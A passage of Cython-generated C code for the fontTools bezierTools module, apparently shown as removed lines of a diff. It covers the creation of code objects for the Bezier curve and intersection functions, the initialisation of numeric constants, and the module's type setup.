__pyx_n_s_d, __pyx_n_s_ax, __pyx_n_s_ay, __pyx_n_s_bx, __pyx_n_s_by, __pyx_n_s_cx, __pyx_n_s_cy, __pyx_n_s_dx, __pyx_n_s_dy, __pyx_n_s_x1, __pyx_n_s_y1, __pyx_n_s_x2, __pyx_n_s_y2, __pyx_n_s_x3, __pyx_n_s_y3, __pyx_n_s_x4, __pyx_n_s_y4); if (unlikely(!__pyx_tuple__63)) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__63); - __Pyx_GIVEREF(__pyx_tuple__63); - __pyx_codeobj__64 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 20, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__63, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_calcCubicPoints, 994, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__64)) __PYX_ERR(0, 994, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - __pyx_tuple__65 = PyTuple_Pack(3, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_t); if (unlikely(!__pyx_tuple__65)) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__65); - __Pyx_GIVEREF(__pyx_tuple__65); - __pyx_codeobj__66 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 3, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__65, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_linePointAtT, 1033, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__66)) __PYX_ERR(0, 1033, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. - * - */ - __pyx_tuple__67 = PyTuple_Pack(6, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_t, __pyx_n_s_x, __pyx_n_s_y); if (unlikely(!__pyx_tuple__67)) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__67); - __Pyx_GIVEREF(__pyx_tuple__67); - __pyx_codeobj__68 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 6, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__67, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_quadraticPointAtT, 1046, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__68)) __PYX_ERR(0, 1046, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - __pyx_tuple__69 = PyTuple_Pack(10, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2, __pyx_n_s_x, __pyx_n_s_y); if (unlikely(!__pyx_tuple__69)) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__69); - __Pyx_GIVEREF(__pyx_tuple__69); - __pyx_codeobj__70 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__69, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_cubicPointAtT, 1061, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__70)) __PYX_ERR(0, 1061, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_tuple__71 = PyTuple_Pack(8, __pyx_n_s_pt1, __pyx_n_s_pt2, __pyx_n_s_pt3, __pyx_n_s_pt4, __pyx_n_s_t, __pyx_n_s_t2, __pyx_n_s_1_t, __pyx_n_s_1_t_2); if (unlikely(!__pyx_tuple__71)) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__71); - __Pyx_GIVEREF(__pyx_tuple__71); - __pyx_codeobj__72 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 8, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__71, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_cubicPointAtTC, 1087, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__72)) __PYX_ERR(0, 1087, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - __pyx_tuple__73 = PyTuple_Pack(2, __pyx_n_s_seg, __pyx_n_s_t); if (unlikely(!__pyx_tuple__73)) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__73); - __Pyx_GIVEREF(__pyx_tuple__73); - __pyx_codeobj__74 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__73, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentPointAtT, 1112, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__74)) __PYX_ERR(0, 1112, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - __pyx_tuple__75 = PyTuple_Pack(9, __pyx_n_s_s, __pyx_n_s_e, __pyx_n_s_pt, __pyx_n_s_sx, __pyx_n_s_sy, __pyx_n_s_ex, __pyx_n_s_ey, __pyx_n_s_px, __pyx_n_s_py); if (unlikely(!__pyx_tuple__75)) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__75); - __Pyx_GIVEREF(__pyx_tuple__75); - __pyx_codeobj__76 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 9, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__75, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_line_t_of_pt, 1127, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__76)) __PYX_ERR(0, 1127, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - __pyx_tuple__77 = PyTuple_Pack(5, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_origin, __pyx_n_s_xDiff, __pyx_n_s_yDiff); if (unlikely(!__pyx_tuple__77)) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__77); - __Pyx_GIVEREF(__pyx_tuple__77); - __pyx_codeobj__78 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__77, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_both_points_are_on_same_side_of, 1141, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__78)) __PYX_ERR(0, 1141, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. - * - */ - __pyx_tuple__79 = PyTuple_Pack(17, __pyx_n_s_s1, __pyx_n_s_e1, __pyx_n_s_s2, __pyx_n_s_e2, __pyx_n_s_s1x, __pyx_n_s_s1y, __pyx_n_s_e1x, __pyx_n_s_e1y, __pyx_n_s_s2x, __pyx_n_s_s2y, __pyx_n_s_e2x, __pyx_n_s_e2y, __pyx_n_s_x, __pyx_n_s_slope34, __pyx_n_s_y, __pyx_n_s_pt, __pyx_n_s_slope12); if (unlikely(!__pyx_tuple__79)) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__79); - __Pyx_GIVEREF(__pyx_tuple__79); - __pyx_codeobj__80 = (PyObject*)__Pyx_PyCode_New(4, 0, 0, 17, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__79, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_lineLineIntersections, 1147, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__80)) __PYX_ERR(0, 1147, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - __pyx_tuple__81 = PyTuple_Pack(4, __pyx_n_s_segment, __pyx_n_s_start, __pyx_n_s_end, __pyx_n_s_angle); if (unlikely(!__pyx_tuple__81)) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__81); - __Pyx_GIVEREF(__pyx_tuple__81); - __pyx_codeobj__82 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__81, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_alignment_transformation, 1225, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__82)) __PYX_ERR(0, 1225, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - __pyx_tuple__83 = PyTuple_Pack(10, __pyx_n_s_curve, __pyx_n_s_line, __pyx_n_s_aligned_curve, __pyx_n_s_a, __pyx_n_s_b, __pyx_n_s_c, __pyx_n_s_intersections, __pyx_n_s_d, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__83)) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__83); - __Pyx_GIVEREF(__pyx_tuple__83); - __pyx_codeobj__84 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 10, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__83, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_line_intersections_t, 1235, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__84)) __PYX_ERR(0, 1235, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. - * - */ - __pyx_tuple__85 = PyTuple_Pack(7, __pyx_n_s_curve, __pyx_n_s_line, __pyx_n_s_pointFinder, __pyx_n_s_intersections, __pyx_n_s_t, __pyx_n_s_pt, __pyx_n_s_line_t); if (unlikely(!__pyx_tuple__85)) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__85); - __Pyx_GIVEREF(__pyx_tuple__85); - __pyx_codeobj__86 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 7, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__85, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curveLineIntersections, 1248, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__86)) __PYX_ERR(0, 1248, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - __pyx_tuple__87 = PyTuple_Pack(1, __pyx_n_s_c); if (unlikely(!__pyx_tuple__87)) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__87); - __Pyx_GIVEREF(__pyx_tuple__87); - __pyx_codeobj__88 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__87, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_bounds, 1286, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__88)) __PYX_ERR(0, 1286, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - __pyx_tuple__89 = PyTuple_Pack(5, __pyx_n_s_c, __pyx_n_s_t, __pyx_n_s_s, __pyx_n_s_e, __pyx_n_s_midpoint); if (unlikely(!__pyx_tuple__89)) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__89); - __Pyx_GIVEREF(__pyx_tuple__89); - __pyx_codeobj__90 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__89, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_split_segment_at_t, 1294, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__90)) __PYX_ERR(0, 1294, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - __pyx_tuple__92 = PyTuple_Pack(25, __pyx_n_s_curve1, __pyx_n_s_curve2, __pyx_n_s_precision, __pyx_n_s_range1, __pyx_n_s_range2, __pyx_n_s_bounds1, __pyx_n_s_bounds2, __pyx_n_s_intersects, __pyx_n_s__91, __pyx_n_s_midpoint, __pyx_n_s_midpoint, __pyx_n_s_c11, __pyx_n_s_c12, __pyx_n_s_c11_range, __pyx_n_s_c12_range, __pyx_n_s_c21, __pyx_n_s_c22, __pyx_n_s_c21_range, __pyx_n_s_c22_range, __pyx_n_s_found, __pyx_n_s_unique_key, __pyx_n_s_seen, __pyx_n_s_unique_values, __pyx_n_s_ts, __pyx_n_s_key); if (unlikely(!__pyx_tuple__92)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__92); - __Pyx_GIVEREF(__pyx_tuple__92); - __pyx_codeobj__93 = (PyObject*)__Pyx_PyCode_New(5, 0, 0, 25, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__92, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curve_curve_intersections_t, 1306, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__93)) __PYX_ERR(0, 1306, __pyx_L1_error) - __pyx_tuple__94 = PyTuple_Pack(3, ((PyObject*)__pyx_float_1eneg_3), Py_None, Py_None); if (unlikely(!__pyx_tuple__94)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__94); - __Pyx_GIVEREF(__pyx_tuple__94); - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - __pyx_tuple__95 = PyTuple_Pack(4, __pyx_n_s_curve1, __pyx_n_s_curve2, __pyx_n_s_intersection_ts, __pyx_n_s_ts); if (unlikely(!__pyx_tuple__95)) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__95); - __Pyx_GIVEREF(__pyx_tuple__95); - __pyx_codeobj__96 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__95, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_curveCurveIntersections, 1373, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__96)) __PYX_ERR(0, 1373, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. - * - */ - __pyx_tuple__97 = PyTuple_Pack(5, __pyx_n_s_seg1, __pyx_n_s_seg2, __pyx_n_s_swapped, __pyx_n_s_intersections, __pyx_n_s_i); if (unlikely(!__pyx_tuple__97)) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__97); - __Pyx_GIVEREF(__pyx_tuple__97); - __pyx_codeobj__98 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__97, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentSegmentIntersections, 1401, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__98)) __PYX_ERR(0, 1401, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - __pyx_tuple__99 = PyTuple_Pack(4, __pyx_n_s_obj, __pyx_n_s_it, __pyx_n_s_genexpr, __pyx_n_s_genexpr); if (unlikely(!__pyx_tuple__99)) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__99); - __Pyx_GIVEREF(__pyx_tuple__99); - __pyx_codeobj__100 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__99, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_segmentrepr, 1449, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__100)) __PYX_ERR(0, 1449, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. - */ - __pyx_tuple__101 = PyTuple_Pack(2, __pyx_n_s_segments, __pyx_n_s_segment); if (unlikely(!__pyx_tuple__101)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_GOTREF(__pyx_tuple__101); - __Pyx_GIVEREF(__pyx_tuple__101); - __pyx_codeobj__102 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__101, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_Lib_fontTools_misc_bezierTools_p, __pyx_n_s_printSegments, 1462, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__102)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_RefNannyFinishContext(); - return 0; - __pyx_L1_error:; - __Pyx_RefNannyFinishContext(); - return -1; -} -/* #### Code section: init_constants ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { - if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); - __pyx_float_0_0 = PyFloat_FromDouble(0.0); if (unlikely(!__pyx_float_0_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_5 = PyFloat_FromDouble(0.5); if (unlikely(!__pyx_float_0_5)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1_0 = PyFloat_FromDouble(1.0); if (unlikely(!__pyx_float_1_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_2_0 = PyFloat_FromDouble(2.0); if (unlikely(!__pyx_float_2_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_3_0 = PyFloat_FromDouble(3.0); if (unlikely(!__pyx_float_3_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_4_0 = PyFloat_FromDouble(4.0); if (unlikely(!__pyx_float_4_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_9_0 = PyFloat_FromDouble(9.0); if (unlikely(!__pyx_float_9_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1eneg_3 = PyFloat_FromDouble(1e-3); if (unlikely(!__pyx_float_1eneg_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_27_0 = PyFloat_FromDouble(27.0); if (unlikely(!__pyx_float_27_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_54_0 = PyFloat_FromDouble(54.0); if (unlikely(!__pyx_float_54_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_005 = PyFloat_FromDouble(0.005); if (unlikely(!__pyx_float_0_005)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_0_125 = PyFloat_FromDouble(0.125); if (unlikely(!__pyx_float_0_125)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_1eneg_10 = PyFloat_FromDouble(1e-10); if (unlikely(!__pyx_float_1eneg_10)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_float_neg_2_0 = PyFloat_FromDouble(-2.0); if (unlikely(!__pyx_float_neg_2_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_0 = PyInt_FromLong(0); if (unlikely(!__pyx_int_0)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_1 = PyInt_FromLong(1); if (unlikely(!__pyx_int_1)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_2 = PyInt_FromLong(2); if (unlikely(!__pyx_int_2)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_3 = PyInt_FromLong(3); if (unlikely(!__pyx_int_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_6 = PyInt_FromLong(6); if (unlikely(!__pyx_int_6)) __PYX_ERR(0, 1, __pyx_L1_error) - __pyx_int_neg_1 = PyInt_FromLong(-1); if (unlikely(!__pyx_int_neg_1)) __PYX_ERR(0, 1, __pyx_L1_error) - return 0; - __pyx_L1_error:; - return -1; -} -/* #### Code section: init_globals ### */ - -static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { - return 0; -} -/* #### Code section: init_module ### */ - -static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ -static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ - -static int __Pyx_modinit_global_init_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); - /*--- Global init code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_variable_export_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); - /*--- Variable export code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_function_export_code(void) { - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); - /*--- Function export code ---*/ - __Pyx_RefNannyFinishContext(); - return 0; -} - -static int __Pyx_modinit_type_init_code(void) { - __Pyx_RefNannyDeclarations - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); - /*--- Type init code ---*/ - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr)) __PYX_ERR(0, 546, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) < 0) __PYX_ERR(0, 546, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr) < 0) __PYX_ERR(0, 546, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_getattro == PyObject_GenericGetAttr)) { - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr->tp_getattro = __Pyx_PyObject_GenericGetAttrNoDict; - } - #endif - #if CYTHON_USE_TYPE_SPECS - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec, NULL); if (unlikely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr)) __PYX_ERR(0, 583, __pyx_L1_error) - if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr_spec, __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 583, __pyx_L1_error) - #else - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr = &__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - #endif - #if !CYTHON_USE_TYPE_SPECS - if (__Pyx_PyType_Ready(__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr) < 0) __PYX_ERR(0, 583, __pyx_L1_error) - #endif - #if PY_MAJOR_VERSION < 3 - __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_print = 0; - #endif - #if !CYTHON_COMPILING_IN_LIMITED_API - if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_dictoffset && __pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr->tp_getattro == PyObject_GenericGetAttr)) { - 